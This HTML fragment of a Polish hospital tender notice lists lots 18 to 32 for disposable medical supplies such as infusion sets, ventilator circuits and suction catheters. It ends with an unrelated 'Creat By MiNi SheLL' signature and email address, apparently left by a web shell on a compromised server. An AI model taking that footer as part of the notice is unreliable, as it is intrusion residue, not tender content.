<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do precyzyjnego sterowania szybkością przepływu w grawitacyjnych infuzjach dożylnych - 2500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> KOCYK DLA DOROSŁYCH DO APARATU EQUATOR.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kocyk dla dorosłych na górną połowę ciała do ogrzewacza koagulacyjnego jednorazowego użytku - 200 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> LINIE DO PODGRZEWACZA HOTLINE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Linie do przepływowego podgrzewacza płynów i krwi jednorazowego użytku - 250 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> ZESTAWY DO KANIULACJI DUŻYCH NACZYŃ, ZESTAWY DO PRZEZSKÓRNEGO DRENAŻU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Zestawy do kaniulacji dużych naczyń- jednokanałowe 5F - 100 szt.
2 ) Zestawy do kaniulacji dużych naczyń- dwukanałowe 7F - 250 szt.
3 ) Zestawy do kaniulacji dużych naczyń- trzykanałowe 6F i 7F - 700 szt.
4 ) Zestawy do kaniulacji dużych naczyń- czterokanałowe 8F lub 8.5F - 50 szt.
5 ) Zestawy do kaniulacji dużych naczyń- trzykanałowe - z powłoką antybakteryjną 7F - 20 szt.
6 ) Zestawy do drenażu przezskórnego - rozszerzony 6F, 9F - 200 szt.
7 ) Zestawy do drenażu przezskórnego- jednostopniowy 9F - 150 szt.
8 ) Przedłużacz do drenażu przezskórnego12F - 400 szt.
9 ) Dren do klatki piersiowej 50 cm - 120 szt.
10 ) Kateter do szynowania jelit 300 cm - 10 szt.
11 ) Rampa trójdrożna - j. uż. sterylna - 500 szt.
12 ) Rampa dwudrożna - j. uż. sterylna - 500 szt.
13 ) Kranik trójdrożny z przedłużeniem luer-lock, przedłużacz 7 cm - 600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> ZESTAWY DO POMIARU CIŚNIENIA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy do pomiaru ciśnienia - 600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> OBWODY DO RESPIRATORA NEFTIS.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obwód pacjenta do respiratora- jednorazowego użytku - 120 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> OBWODY DO APARATÓW DO ZNIECZULENIA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obwód oddechowy jednorazowy do znieczulenia (2 rury min. 180 cm, 1 rura min. 90 cm, łącznik Y, łącznik prosty, worek oddechowy 2-3l) - 500 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> OBWODY DO RESPIRATORA (OIT).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obwód oddechowy, jednorazowy do respiratorów ( 2 rury po 150 cm, trójnik Y z portami, złącze pacjenta 22M/15 F, złącze respiratora 22 Flex- 22 Flex) - 600 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> KONEKTOR KĄTOWY 90o.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konektor kątowy 90otypu Flex - 300 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> ELEKTRODY DO CZASOWEJ STYMULACJI SERCA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Elektroda do czasowej stymulacji serca 6F, 7F - 20 szt.
2) Introduktor do wprowadzania elektrod 7F, 8F - 30 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> PRZYRZĄDY DO ŻYWIENIA DOJELITOWEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przyrządy do żywienia typu PACK - 300 szt.
2) Przyrządy do żywienia do butelek - 1200 szt.
3) Zgłębnik poliuretanowy 10/130 - 40 szt.
4) Zgłębnik poliuretanowy 12/110-130 - 40 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> WORKI KOLOSTOMIJNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worki kolostomijne - 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> KRANIKI TRÓJDROŻNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedłużacz luer-lock z kranikiem trójdrożnym 10 cm - 500 szt. 
2) Przedłużacz luer-lock z kranikiem trójdrożnym 20 cm - 25 cm - 300 szt.
3) Kranik trójdrożny - jednorazowego użytku -sterylny - 8000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> DRENY DO POMPY OBJĘTOŚCIOWEJ GRASEBY 3000.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Zestaw do krwi bez portu do wstrzyknięć -standard, filtr 200 mikr. - 50 szt.
2 ) Zestaw infuzyjny pediatryczny z portem - standard - 50 szt.
3 ) Zestaw infuzyjny do przetoczeń leków cytotoksycznych w komplecie filtr do przetoczeń cytostatyków typu Paclitaxel. - 50 szt.
4 ) Zestaw infuzyjny do przetoczeń leków cytotoksycznych - 300 szt.
5 ) Zestaw infuzyjny do przetoczeń z portem - standard - 50 szt.
6 ) Filtr do płynów na 96 godzin dla noworodków -  100 szt.
7 ) Filtr do żywienia dojelitowego dla noworodków -  100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> CEWNIKI DO ODSYSANIA, PRZEDŁUŻACZE, ZGŁĘBNIKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ) Cewniki do odsysania - Ch4 dł. do 600 mm - 300 szt.
2 ) Cewniki do odsysania - Ch6 dł. do 600 mm - 7 000 szt.
3 ) Cewniki do odsysania - Ch8 dł. do 600 mm - 10 000 szt.
4 ) Cewniki do odsysania - Ch10 dł. do 600 mm - 12 000 szt.
5 ) Cewniki do odsysania - Ch12 dł. do 600 mm - 10 000 szt.
6 ) Cewniki do odsysania - Ch14 dł. min. 600mm - 20 000 szt.
7 ) Cewniki do odsysania - Ch16 dł. min. 600mm - 20 000 szt.
8 ) Cewniki do odsysania - Ch18 dł. min. 600mm - 15 000 szt.
9 ) Cewniki do karmienia niemowląt z zatyczką jednorazowego użytku - Ch6 - 12 000 szt.
10 ) Cewniki do karmienia niemowląt z zatyczką jednorazowego użytku  - Ch8 - 12 000 szt.
11 ) Cewniki do podawania tlenu przez nos (wąsy) jednorazowego użytku - 5 000 szt.
12 ) Przedłużacze do pomp LUER-LOCK - dł. 0,90m - 100 szt.
13 ) Przedłużacze do pomp LUER-LOCK  - dł. 1,20m - 100 szt.
14 ) Przedłużacze do pomp LUER-LOCK  - dł. 1,50m - 30 000 szt.
15 ) Przedłużacze do pomp LUER-LOCK bursztynowy -  dł. 1,50m - 1000 szt.
16 ) Zgłębnik żołądkowy sterylny - Ch8 - 20 szt.
17 ) Zgłębnik żołądkowy sterylny  - Ch10 - 50 szt.
18 ) Zgłębnik żołądkowy sterylny  - Ch12 dł. 800mm - 50 szt.
19 ) Zgłębnik żołądkowy sterylny  - Ch14 dł. 800mm - 800 szt.
20 ) Zgłębnik żołądkowy sterylny  - Ch16 dł. 800mm - 900 szt.
21 ) Zgłębnik żołądkowy sterylny  - Ch18 dł.1000mm - 900 szt.
22 ) Zgłębnik żołądkowy sterylny - Ch20 dł.1000mm - 300 szt.
23 ) Zgłębnik żołądkowy sterylny  - Ch28 dł.1000mm - 200 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> ZESTAWY DO ZNIECZULEŃ ZEWNĄTRZOPONOWYCH CIĄGŁYCH, ORAZ ŁĄCZONYCH ZEWNĄTRZOPONOWO-PODPAJĘCZYCH (CSE).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw do znieczulenia zewnątrzoponowego ciągłego - 600 szt.
2) Filtry zewnątrzoponowe płaskie - 100 szt.
3) Systemy mocowania cewnika do skóry pacjenta - 150 szt.
4)Zestaw do łączonego znieczulenia zewnątrzoponowo-podpajęczego - 200 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com